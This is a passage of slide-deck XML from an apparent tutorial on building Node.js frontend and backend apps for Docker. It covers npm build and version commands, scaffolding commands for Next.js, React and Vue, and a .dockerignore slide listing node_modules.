            </a:r>
            <a:endParaRPr sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-439419" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="3320"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ExpressJs</a:t>
            </a:r>
            <a:endParaRPr sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-439419" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="3320"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>MoleculerJs</a:t>
            </a:r>
            <a:endParaRPr sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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212"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2621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Frontend Apps</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1329" name="Google Shape;1329;p212"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1214775"/>
            <a:ext cx="8697000" cy="3621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35"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All App (Front/Back) need to be build before it to be launched on production server</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In NodeJs, we build with</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>npm run build</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2621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Frontend Apps</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1335" name="Google Shape;1335;p213"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1214775"/>
            <a:ext cx="8697000" cy="3621900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-407669" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2820"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Must Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2820" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>NodeJs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in your Host/Container Machine</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>node -- version</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>node -v</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>npm -v</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4798" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879300" y="276700"/>
            <a:ext cx="6106251" cy="459007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14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2621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Frontend Apps</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1341" name="Google Shape;1341;p214"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215550" y="1214775"/>
            <a:ext cx="8793300" cy="3621900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-350520" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="1920"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1920" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>NextJs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1920">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    ~198MB</a:t>
            </a:r>
            <a:endParaRPr sz="1920">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1920">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr sz="1920">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1920">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>npx create-next-app@latest  &lt;projName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>	npm run dev</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-350520" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="1920"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1920" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ReactJs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1920">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1920">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>~230MB</a:t>
            </a:r>
            <a:endParaRPr sz="300">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>npm install -g create-react-app</a:t>
            </a:r>
            <a:endParaRPr sz="200">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1820">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr sz="1820">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>npx create-react-app  &lt;projName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>     	npm start</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>VueJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>    ~</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>	Npm create vue@latest &lt;projName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2621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.dockerignore</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1347" name="Google Shape;1347;p215"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631725" y="1214775"/>
            <a:ext cx="7822200" cy="3621900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/node_modules</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2621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.dockerignore</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1353" name="Google Shape;1353;p216"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
